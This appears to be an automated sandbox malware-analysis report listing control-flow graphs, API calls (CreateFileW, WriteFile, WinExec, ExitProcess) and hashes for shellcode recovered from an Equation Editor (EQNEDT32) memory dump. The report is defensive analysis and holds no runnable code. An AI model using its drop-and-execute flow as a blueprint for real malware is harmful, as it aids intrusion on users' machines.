                                                                                                                                                control_flow_graph 0 35005e9-35005ec 2 35005ee-35005ff 0->2 7 3500601-3500606 2->7 8 3500636-3500641 call 350064a 2->8 9 3500608 7->9 10 350060d-3500634 WriteFile 7->10 13 3500643-3500662 call 350066b 8->13 14 35006a8-35006b3 WinExec call 35006bc 8->14 9->10 10->2 29 35006d0-35006d8 13->29 30 3500664 13->30 25 3500705 14->25 26 35006b5 14->26 27 3500707-350070b 25->27 28 350070d-3500711 25->28 31 3500726-3500728 26->31 32 35006b7-35006c1 ExitProcess 26->32 27->28 35 3500719-3500720 27->35 28->31 36 3500713-3500717 28->36 33 35006da-35006dc 29->33 34 35006fe-3500702 29->34 37 3500666-3500667 30->37 38 35006cf 30->38 40 3500738-3500739 31->40 41 35006dd-35006e2 33->41 34->25 43 3500722 35->43 44 3500724 35->44 36->31 36->35 37->41 42 3500669-3500695 call 350069c 37->42 38->29 45 35006d1-35006e2 call 35006eb 41->45 46 35006e4-35006e8 41->46 42->38 43->31 44->31 47 350072a-3500733 44->47 45->46 52 3500735 47->52 53 35006fc-35006ff 47->53 52->40 53->47 56 3500701 53->56 56->25
                                                                                                                                                APIs
                                                                                                                                                • WriteFile.KERNELBASE(03500523,0350053A,00000000,00000000,00000000,?,0350053A,03500523,00000000,00000000,00000000,00000000,035004DC,00000050,00000000), ref: 03500632
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID: seHandle
                                                                                                                                                • API String ID: 3934441357-3114118676
                                                                                                                                                • Opcode ID: 18553326b85a00a69889a48aee1867741f33fb832c981e95635d7b85ca4053e9
                                                                                                                                                • Instruction ID: 5b6538c0871243ce67f6dc38e3bfcb57ed416cf301924dd45cde5cde91454251
                                                                                                                                                • Opcode Fuzzy Hash: 18553326b85a00a69889a48aee1867741f33fb832c981e95635d7b85ca4053e9
                                                                                                                                                • Instruction Fuzzy Hash: 4021A4704083456AD711FAA0ED45F6FBBAAFBC1B10F148E0DF1914B0F1E6B6D5088AA6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 58 3500292 59 3500297-3500394 58->59 65 350039a-35003de call 35003b7 59->65 66 350027d-3500315 59->66 70 3500431-350044d 65->70 71 35003e1 65->71 66->59 75 350044e-3500451 call 350045f 70->75 73 3500452-3500454 71->73 74 35003e3-35003e6 71->74 77 3500455-3500457 73->77 78 35004bb call 35004cf 73->78 74->75 76 35003e9 74->76 75->73 80 35003eb-3500403 76->80 81 350045e-350046f 76->81 83 3500459-350045a 77->83 84 35004be-3500507 call 35004f6 77->84 78->84 87 3500474-3500481 CreateFileW call 3500496 80->87 91 3500405-3500409 80->91 81->87 83->81 99 3500509-350050b 84->99 100 350056e 84->100 93 3500486-3500494 87->93 91->81 94 350040b 91->94 97 350040d-3500430 call 350044c 94->97 98 350047f 94->98 97->70 98->93 102 3500481 call 3500496 98->102 103 3500583-3500584 99->103 104 350050e 99->104 105 3500570-350057c call 350058f 100->105 106 3500594-35005a2 call 35005ab 100->106 102->93 108 3500585-3500587 103->108 109 35005eb-35005ec 103->109 104->108 111 3500511-3500557 call 3500535 104->111 122 35005f2 105->122 137 350057e 105->137 131 350060d-3500634 WriteFile 106->131 139 35005a4 106->139 115 35005fa-35005ff 108->115 116 350058a-350058c 108->116 114 35005ee 109->114 135 350055a 111->135 136 35005cf 111->136 114->122 123 3500601-3500606 115->123 124 3500636-3500641 call 350064a 115->124 125 35005f3-35005f9 116->125 126 350058e-3500592 116->126 122->125 130 3500608 123->130 123->131 140 3500643-3500648 124->140 141 35006a8-35006b3 WinExec call 35006bc 124->141 125->115 126->106 130->131 131->114 145 35005d1 135->145 146 350055d-3500584 call 350058f 135->146 136->145 142 3500580 137->142 143 35005d2-35005e6 call 35005e9 137->143 147 35005a6-35005af 139->147 148 350060b 139->148 149 350064c-3500662 call 350066b 140->149 166 3500705 141->166 167 35006b5 141->167 142->103 162 35005e8 143->162 163 3500649 143->163 145->143 146->109 164 3500586-3500587 146->164 148->131 170 35006d0-35006d8 149->170 171 3500664 149->171 162->109 163->149 164->115 164->116 168 3500707-350070b 166->168 169 350070d-3500711 166->169 172 3500726-3500728 167->172 173 35006b7-35006c1 ExitProcess 167->173 168->169 176 3500719-3500720 168->176 169->172 177 3500713-3500717 169->177 174 35006da-35006dc 170->174 175 35006fe-3500702 170->175 178 3500666-3500667 171->178 179 35006cf 171->179 181 3500738-3500739 172->181 182 35006dd-35006e2 174->182 175->166 184 3500722 176->184 185 3500724 176->185 177->172 177->176 178->182 183 3500669-3500695 call 350069c 178->183 179->170 186 35006d1-35006e2 call 35006eb 182->186 187 35006e4-35006e8 182->187 183->179 184->172 185->172 188 350072a-3500733 185->188 186->187 193 3500735 188->193 194 35006fc-35006ff 188->194 193->181 194->188 197 3500701 194->197 197->166
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID: C
                                                                                                                                                • API String ID: 2838702978-1677776730
                                                                                                                                                • Opcode ID: a987d9aec161237c093e9e42f52555f13ade90e88a6126b19d59bf0814b6e1ba
                                                                                                                                                • Instruction ID: a4706a3c82d065e544e17ae69468243da1608abc52ced4a9b2efc9a5e21ee3b9
                                                                                                                                                • Opcode Fuzzy Hash: a987d9aec161237c093e9e42f52555f13ade90e88a6126b19d59bf0814b6e1ba
                                                                                                                                                • Instruction Fuzzy Hash: 8831EE6180D3C05FD712D7306E5A7A4BF607B13500F0D8ADBC4C94F1F3E2A6924A936A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 199 35005ab-35005bd call 35005cf 203 3500624-3500625 199->203 204 35005bf 199->204 207 3500629-3500634 WriteFile 203->207 205 35005c1-35005c3 204->205 206 350063a-3500641 204->206 210 35005c5-35005c6 205->210 211 3500626 205->211 208 3500643-3500648 206->208 209 35006a8-35006b3 WinExec call 35006bc 206->209 212 35005ee-35005f3 207->212 214 350064c-3500662 call 350066b 208->214 227 3500705 209->227 228 35006b5 209->228 210->207 217 35005c8-35005e6 call 35005e9 210->217 213 3500628 211->213 211->214 225 35005f9-35005ff 212->225 213->207 233 35006d0-35006d8 214->233 234 3500664 214->234 237 35005e8-35005ec 217->237 238 3500649 217->238 241 3500601-3500606 225->241 242 3500636-3500641 call 350064a 225->242 231 3500707-350070b 227->231 232 350070d-3500711 227->232 235 3500726-3500728 228->235 236 35006b7-35006c1 ExitProcess 228->236 231->232 243 3500719-3500720 231->243 232->235 244 3500713-3500717 232->244 239 35006da-35006dc 233->239 240 35006fe-3500702 233->240 245 3500666-3500667 234->245 246 35006cf 234->246 248 3500738-3500739 235->248 237->212 238->214 250 35006dd-35006e2 239->250 240->227 251 3500608 241->251 252 350060d-3500620 241->252 242->208 242->209 254 3500722 243->254 255 3500724 243->255 244->235 244->243 245->250 253 3500669-3500695 call 350069c 245->253 246->233 258 35006d1-35006e2 call 35006eb 250->258 259 35006e4-35006e8 250->259 251->252 252->203 253->246 254->235 255->235 260 350072a-3500733 255->260 258->259 266 3500735 260->266 267 35006fc-35006ff 260->267 266->248 267->260 270 3500701 267->270 270->227
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite
                                                                                                                                                • String ID: seHandle
                                                                                                                                                • API String ID: 3934441357-3114118676
                                                                                                                                                • Opcode ID: d34d02f4a8ccd5734fb77dc4fe02df7d8690f4fc7bcc259526d2b40a5bd39fd5
                                                                                                                                                • Instruction ID: 419962e4bb8e223af516e4c3f965aaa96ba9cebd4122bd2c903d20dab7064c72
                                                                                                                                                • Opcode Fuzzy Hash: d34d02f4a8ccd5734fb77dc4fe02df7d8690f4fc7bcc259526d2b40a5bd39fd5
                                                                                                                                                • Instruction Fuzzy Hash: 2B21A9714083416FD711EAA0DD41F6FBBBAFBC2B50F14894DF1914B0F2E6B2D5099692
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 272 35003b7-35003de ExitProcess call 35003d0 275 3500431-350044d 272->275 276 35003e1 272->276 280 350044e-3500451 call 350045f 275->280 278 3500452-3500454 276->278 279 35003e3-35003e6 276->279 282 3500455-3500457 278->282 283 35004bb call 35004cf 278->283 279->280 281 35003e9 279->281 280->278 285 35003eb-3500403 281->285 286 350045e-350046f 281->286 288 3500459-350045a 282->288 289 35004be-3500507 call 35004f6 282->289 283->289 292 3500474-3500481 CreateFileW call 3500496 285->292 296 3500405-3500409 285->296 286->292 288->286 304 3500509-350050b 289->304 305 350056e 289->305 298 3500486-3500494 292->298 296->286 299 350040b 296->299 302 350040d-3500430 call 350044c 299->302 303 350047f 299->303 302->275 303->298 307 3500481 call 3500496 303->307 308 3500583-3500584 304->308 309 350050e 304->309 310 3500570-350057c call 350058f 305->310 311 3500594-35005a2 call 35005ab 305->311 307->298 313 3500585-3500587 308->313 314 35005eb-35005ec 308->314 309->313 316 3500511-3500557 call 3500535 309->316 327 35005f2 310->327 342 350057e 310->342 336 350060d-3500634 WriteFile 311->336 344 35005a4 311->344 320 35005fa-35005ff 313->320 321 350058a-350058c 313->321 319 35005ee 314->319 340 350055a 316->340 341 35005cf 316->341 319->327 328 3500601-3500606 320->328 329 3500636-3500641 call 350064a 320->329 330 35005f3-35005f9 321->330 331 350058e-3500592 321->331 327->330 335 3500608 328->335 328->336 345 3500643-3500648 329->345 346 35006a8-35006b3 WinExec call 35006bc 329->346 330->320 331->311 335->336 336->319 350 35005d1 340->350 351 350055d-3500584 call 350058f 340->351 341->350 347 3500580 342->347 348 35005d2-35005e6 call 35005e9 342->348 352 35005a6-35005af 344->352 353 350060b 344->353 354 350064c-3500662 call 350066b 345->354 371 3500705 346->371 372 35006b5 346->372 347->308 367 35005e8 348->367 368 3500649 348->368 350->348 351->314 369 3500586-3500587 351->369 353->336 375 35006d0-35006d8 354->375 376 3500664 354->376 367->314 368->354 369->320 369->321 373 3500707-350070b 371->373 374 350070d-3500711 371->374 377 3500726-3500728 372->377 378 35006b7-35006c1 ExitProcess 372->378 373->374 381 3500719-3500720 373->381 374->377 382 3500713-3500717 374->382 379 35006da-35006dc 375->379 380 35006fe-3500702 375->380 383 3500666-3500667 376->383 384 35006cf 376->384 386 3500738-3500739 377->386 387 35006dd-35006e2 379->387 380->371 389 3500722 381->389 390 3500724 381->390 382->377 382->381 383->387 388 3500669-3500695 call 350069c 383->388 384->375 391 35006d1-35006e2 call 35006eb 387->391 392 35006e4-35006e8 387->392 388->384 389->377 390->377 393 350072a-3500733 390->393 391->392 398 3500735 393->398 399 35006fc-35006ff 393->399 398->386 399->393 402 3500701 399->402 402->371
                                                                                                                                                APIs
                                                                                                                                                • ExitProcess.KERNELBASE(035003A5), ref: 035003B7
                                                                                                                                                  • Part of subcall function 035003D0: CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0350047C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 6414d41aded95c3167a019247c819fa869701a2fe4505c8274b025708f2f607e
                                                                                                                                                • Instruction ID: 5d9eaeaebf38246f1cadae31c8ee10df89e05787028b1f5c6da671a5f18a6655
                                                                                                                                                • Opcode Fuzzy Hash: 6414d41aded95c3167a019247c819fa869701a2fe4505c8274b025708f2f607e
                                                                                                                                                • Instruction Fuzzy Hash: 5121F16580D7C01FD321D7702E9A7A4BF60BB53900F1D8ADE81C54F1F3E2A7924A935A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 404 350069c-35006b3 WinExec call 35006bc 410 3500705 404->410 411 35006b5 404->411 412 3500707-350070b 410->412 413 350070d-3500711 410->413 414 3500726-3500728 411->414 415 35006b7-35006c1 ExitProcess 411->415 412->413 416 3500719-3500720 412->416 413->414 417 3500713-3500717 413->417 419 3500738-3500739 414->419 420 3500722 416->420 421 3500724 416->421 417->414 417->416 420->414 421->414 422 350072a-3500733 421->422 425 3500735 422->425 426 35006fc-35006ff 422->426 425->419 426->422 427 3500701 426->427 427->410
                                                                                                                                                APIs
                                                                                                                                                • WinExec.KERNEL32(?,00000001,?,03500694,?,03500657,?,?,0350063E,00000000,00000000,00000000,00000000,035004DC,00000050,00000000), ref: 035006A9
                                                                                                                                                  • Part of subcall function 035006BC: ExitProcess.KERNELBASE(00000000,?,035006B0,?,03500694,?,03500657,?,?,0350063E,00000000,00000000,00000000,00000000,035004DC,00000050), ref: 035006C1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecExitProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4112423671-0
                                                                                                                                                • Opcode ID: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
                                                                                                                                                • Instruction ID: f863ca485839f236006cab30ff7dbc6ec09b823262cb18019c105310fe7fae7a
                                                                                                                                                • Opcode Fuzzy Hash: 09d7e942a8b6d033ba72d1ddd3f717c78c986e7522e5b90d67ec5e1a4840f4c2
                                                                                                                                                • Instruction Fuzzy Hash: 7EF0F4A990434261CB30F22868557FBAB91BB81350FCC8847D882070F5E56F81C38E5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 428 350044c-3500454 call 350045f 433 3500455-3500457 428->433 434 35004bb call 35004cf 428->434 436 3500459-3500494 CreateFileW call 3500496 433->436 437 35004be-3500507 call 35004f6 433->437 434->437 446 3500509-350050b 437->446 447 350056e 437->447 449 3500583-3500584 446->449 450 350050e 446->450 451 3500570-350057c call 350058f 447->451 452 3500594-35005a2 call 35005ab 447->452 453 3500585-3500587 449->453 454 35005eb-35005ec 449->454 450->453 456 3500511-3500557 call 3500535 450->456 465 35005f2 451->465 480 350057e 451->480 474 350060d-3500634 WriteFile 452->474 482 35005a4 452->482 460 35005fa-35005ff 453->460 461 350058a-350058c 453->461 459 35005ee 454->459 478 350055a 456->478 479 35005cf 456->479 459->465 466 3500601-3500606 460->466 467 3500636-3500641 call 350064a 460->467 468 35005f3-35005f9 461->468 469 350058e-3500592 461->469 465->468 473 3500608 466->473 466->474 483 3500643-3500648 467->483 484 35006a8-35006b3 WinExec call 35006bc 467->484 468->460 469->452 473->474 474->459 488 35005d1 478->488 489 350055d-3500584 call 350058f 478->489 479->488 485 3500580 480->485 486 35005d2-35005e6 call 35005e9 480->486 490 35005a6-35005af 482->490 491 350060b 482->491 492 350064c-3500662 call 350066b 483->492 509 3500705 484->509 510 35006b5 484->510 485->449 505 35005e8 486->505 506 3500649 486->506 488->486 489->454 507 3500586-3500587 489->507 491->474 513 35006d0-35006d8 492->513 514 3500664 492->514 505->454 506->492 507->460 507->461 511 3500707-350070b 509->511 512 350070d-3500711 509->512 515 3500726-3500728 510->515 516 35006b7-35006c1 ExitProcess 510->516 511->512 519 3500719-3500720 511->519 512->515 520 3500713-3500717 512->520 517 35006da-35006dc 513->517 518 35006fe-3500702 513->518 521 3500666-3500667 514->521 522 35006cf 514->522 524 3500738-3500739 515->524 525 35006dd-35006e2 517->525 518->509 527 3500722 519->527 528 3500724 519->528 520->515 520->519 521->525 526 3500669-3500695 call 350069c 521->526 522->513 529 35006d1-35006e2 call 35006eb 525->529 530 35006e4-35006e8 525->530 526->522 527->515 528->515 531 350072a-3500733 528->531 529->530 536 3500735 531->536 537 35006fc-35006ff 531->537 536->524 537->531 540 3500701 537->540 540->509
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 4dffbc39676873fdc514b4a93b0b437944a69b5352fc09b0b4d07c6674c981cd
                                                                                                                                                • Instruction ID: 6766ea85875603fe3717f8023f16a0c32b9ba414879eeb35bd82dd826fc2d1af
                                                                                                                                                • Opcode Fuzzy Hash: 4dffbc39676873fdc514b4a93b0b437944a69b5352fc09b0b4d07c6674c981cd
                                                                                                                                                • Instruction Fuzzy Hash: B341AB6044D3C12EDB22E7B4AD66B6ABF747F83600F1985CEE2814F1F3E6965205C31A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 542 35004f6-3500507 call 3500512 546 3500509-350050b 542->546 547 350056e 542->547 548 3500583-3500584 546->548 549 350050e 546->549 550 3500570-3500573 call 350058f 547->550 551 3500594-35005a2 call 35005ab 547->551 552 3500585-3500587 548->552 553 35005eb-35005ec 548->553 549->552 554 3500511-3500557 call 3500535 549->554 570 3500574-350057c 550->570 572 350060d-3500634 WriteFile 551->572 580 35005a4 551->580 558 35005fa-35005ff 552->558 559 350058a-350058c 552->559 557 35005ee 553->557 576 350055a 554->576 577 35005cf 554->577 563 35005f2 557->563 564 3500601-3500606 558->564 565 3500636-3500641 call 350064a 558->565 566 35005f3 559->566 567 350058e-3500592 559->567 563->566 571 3500608 564->571 564->572 581 3500643-3500648 565->581 582 35006a8-35006b3 WinExec call 35006bc 565->582 579 35005f9 566->579 567->551 570->563 578 350057e 570->578 571->572 572->557 586 35005d1 576->586 587 350055d-350056d 576->587 577->586 583 3500580 578->583 584 35005d2-35005e6 call 35005e9 578->584 579->558 588 35005a6-35005af 580->588 589 350060b 580->589 590 350064c-3500662 call 350066b 581->590 607 3500705 582->607 608 35006b5 582->608 583->548 603 35005e8 584->603 604 3500649 584->604 586->584 594 3500573-3500584 call 350058f 587->594 589->572 611 35006d0-35006d8 590->611 612 3500664 590->612 594->553 605 3500586-3500587 594->605 603->553 604->590 605->558 605->559 609 3500707-350070b 607->609 610 350070d-3500711 607->610 613 3500726-3500728 608->613 614 35006b7-35006c1 ExitProcess 608->614 609->610 617 3500719-3500720 609->617 610->613 618 3500713-3500717 610->618 615 35006da-35006dc 611->615 616 35006fe-3500702 611->616 619 3500666-3500667 612->619 620 35006cf 612->620 622 3500738-3500739 613->622 623 35006dd-35006e2 615->623 616->607 625 3500722 617->625 626 3500724 617->626 618->613 618->617 619->623 624 3500669-3500695 call 350069c 619->624 620->611 627 35006d1-35006e2 call 35006eb 623->627 628 35006e4-35006e8 623->628 624->620 625->613 626->613 629 350072a-3500733 626->629 627->628 634 3500735 629->634 635 35006fc-35006ff 629->635 634->622 635->629 638 3500701 635->638 638->607
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 664742f590045bbcf0d15909ae765ea9a2740273dbd5d7486921ae46d5827649
                                                                                                                                                • Instruction ID: 015d08f123aa02693699928542e6845b854b00882184b74dfb591fc7bb0b0775
                                                                                                                                                • Opcode Fuzzy Hash: 664742f590045bbcf0d15909ae765ea9a2740273dbd5d7486921ae46d5827649
                                                                                                                                                • Instruction Fuzzy Hash: 3331C76044C3C22FD712DBA4DD51B6BBF79BFC2600F18898EF1814B0F2E6669618C766
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 640 3500224-3500242 642 350027d-3500394 640->642 650 350039a-35003de call 35003b7 642->650 653 3500431-350044d 650->653 654 35003e1 650->654 658 350044e-3500451 call 350045f 653->658 656 3500452-3500454 654->656 657 35003e3-35003e6 654->657 660 3500455-3500457 656->660 661 35004bb call 35004cf 656->661 657->658 659 35003e9 657->659 658->656 663 35003eb-3500403 659->663 664 350045e-350046f 659->664 666 3500459-350045a 660->666 667 35004be-3500507 call 35004f6 660->667 661->667 670 3500474-3500481 CreateFileW call 3500496 663->670 674 3500405-3500409 663->674 664->670 666->664 682 3500509-350050b 667->682 683 350056e 667->683 676 3500486-3500494 670->676 674->664 677 350040b 674->677 680 350040d-3500430 call 350044c 677->680 681 350047f 677->681 680->653 681->676 685 3500481 call 3500496 681->685 686 3500583-3500584 682->686 687 350050e 682->687 688 3500570-350057c call 350058f 683->688 689 3500594-35005a2 call 35005ab 683->689 685->676 691 3500585-3500587 686->691 692 35005eb-35005ec 686->692 687->691 694 3500511-3500557 call 3500535 687->694 705 35005f2 688->705 720 350057e 688->720 714 350060d-3500634 WriteFile 689->714 722 35005a4 689->722 698 35005fa-35005ff 691->698 699 350058a-350058c 691->699 697 35005ee 692->697 718 350055a 694->718 719 35005cf 694->719 697->705 706 3500601-3500606 698->706 707 3500636-3500641 call 350064a 698->707 708 35005f3-35005f9 699->708 709 350058e-3500592 699->709 705->708 713 3500608 706->713 706->714 723 3500643-3500648 707->723 724 35006a8-35006b3 WinExec call 35006bc 707->724 708->698 709->689 713->714 714->697 728 35005d1 718->728 729 350055d-3500584 call 350058f 718->729 719->728 725 3500580 720->725 726 35005d2-35005e6 call 35005e9 720->726 730 35005a6-35005af 722->730 731 350060b 722->731 732 350064c-3500662 call 350066b 723->732 749 3500705 724->749 750 35006b5 724->750 725->686 745 35005e8 726->745 746 3500649 726->746 728->726 729->692 747 3500586-3500587 729->747 731->714 753 35006d0-35006d8 732->753 754 3500664 732->754 745->692 746->732 747->698 747->699 751 3500707-350070b 749->751 752 350070d-3500711 749->752 755 3500726-3500728 750->755 756 35006b7-35006c1 ExitProcess 750->756 751->752 759 3500719-3500720 751->759 752->755 760 3500713-3500717 752->760 757 35006da-35006dc 753->757 758 35006fe-3500702 753->758 761 3500666-3500667 754->761 762 35006cf 754->762 764 3500738-3500739 755->764 765 35006dd-35006e2 757->765 758->749 767 3500722 759->767 768 3500724 759->768 760->755 760->759 761->765 766 3500669-3500695 call 350069c 761->766 762->753 769 35006d1-35006e2 call 35006eb 765->769 770 35006e4-35006e8 765->770 766->762 767->755 768->755 771 350072a-3500733 768->771 769->770 776 3500735 771->776 777 35006fc-35006ff 771->777 776->764 777->771 780 3500701 777->780 780->749
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: dfef57e11d2bddf6dabb232f9357d3650d6a3ed9f6d4ec21481c072131263883
                                                                                                                                                • Instruction ID: 09405a660972302693537b34ae13c229fe1ffdd9068c4097385c82d0631a8577
                                                                                                                                                • Opcode Fuzzy Hash: dfef57e11d2bddf6dabb232f9357d3650d6a3ed9f6d4ec21481c072131263883
                                                                                                                                                • Instruction Fuzzy Hash: B441EF6140D3C19FE716D630AE9A7A4BF60BB13600F1C4ADBC4C64F1F3E266924A935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 782 35002a4-35002c5 783 3500242 782->783 784 35002d8-3500394 782->784 786 350027d-3500388 783->786 784->786 788 350039a-35003de call 35003b7 784->788 786->784 794 3500431-350044d 788->794 795 35003e1 788->795 800 350044e-3500451 call 350045f 794->800 797 3500452-3500454 795->797 798 35003e3-35003e6 795->798 802 3500455-3500457 797->802 803 35004bb call 35004cf 797->803 798->800 801 35003e9 798->801 800->797 805 35003eb-3500403 801->805 806 350045e-350046f 801->806 808 3500459-350045a 802->808 809 35004be-3500507 call 35004f6 802->809 803->809 812 3500474-3500481 CreateFileW call 3500496 805->812 816 3500405-3500409 805->816 806->812 808->806 824 3500509-350050b 809->824 825 350056e 809->825 818 3500486-3500494 812->818 816->806 819 350040b 816->819 822 350040d-3500430 call 350044c 819->822 823 350047f 819->823 822->794 823->818 827 3500481 call 3500496 823->827 828 3500583-3500584 824->828 829 350050e 824->829 830 3500570-350057c call 350058f 825->830 831 3500594-35005a2 call 35005ab 825->831 827->818 833 3500585-3500587 828->833 834 35005eb-35005ec 828->834 829->833 836 3500511-3500557 call 3500535 829->836 847 35005f2 830->847 862 350057e 830->862 856 350060d-3500634 WriteFile 831->856 864 35005a4 831->864 840 35005fa-35005ff 833->840 841 350058a-350058c 833->841 839 35005ee 834->839 860 350055a 836->860 861 35005cf 836->861 839->847 848 3500601-3500606 840->848 849 3500636-3500641 call 350064a 840->849 850 35005f3-35005f9 841->850 851 350058e-3500592 841->851 847->850 855 3500608 848->855 848->856 865 3500643-3500648 849->865 866 35006a8-35006b3 WinExec call 35006bc 849->866 850->840 851->831 855->856 856->839 870 35005d1 860->870 871 350055d-3500584 call 350058f 860->871 861->870 867 3500580 862->867 868 35005d2-35005e6 call 35005e9 862->868 872 35005a6-35005af 864->872 873 350060b 864->873 874 350064c-3500662 call 350066b 865->874 891 3500705 866->891 892 35006b5 866->892 867->828 887 35005e8 868->887 888 3500649 868->888 870->868 871->834 889 3500586-3500587 871->889 873->856 895 35006d0-35006d8 874->895 896 3500664 874->896 887->834 888->874 889->840 889->841 893 3500707-350070b 891->893 894 350070d-3500711 891->894 897 3500726-3500728 892->897 898 35006b7-35006c1 ExitProcess 892->898 893->894 901 3500719-3500720 893->901 894->897 902 3500713-3500717 894->902 899 35006da-35006dc 895->899 900 35006fe-3500702 895->900 903 3500666-3500667 896->903 904 35006cf 896->904 906 3500738-3500739 897->906 907 35006dd-35006e2 899->907 900->891 909 3500722 901->909 910 3500724 901->910 902->897 902->901 903->907 908 3500669-3500695 call 350069c 903->908 904->895 911 35006d1-35006e2 call 35006eb 907->911 912 35006e4-35006e8 907->912 908->904 909->897 910->897 913 350072a-3500733 910->913 911->912 918 3500735 913->918 919 35006fc-35006ff 913->919 918->906 919->913 922 3500701 919->922 922->891
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 5ebe6dbe8446fcf77d266a32399f0b43572dd073ed1ea87871433eda64c3c390
                                                                                                                                                • Instruction ID: ef3f7e9bce261aef6315b82c2e3975fdf35132cb24e154857e57ea8d26b61a7d
                                                                                                                                                • Opcode Fuzzy Hash: 5ebe6dbe8446fcf77d266a32399f0b43572dd073ed1ea87871433eda64c3c390
                                                                                                                                                • Instruction Fuzzy Hash: 3041FF6140D3C09FD716D720AE5A7A5BF60BB12600F1C4ADBC4CA4F1F3E267924A935A
                                                                                                                                                Uniqueness

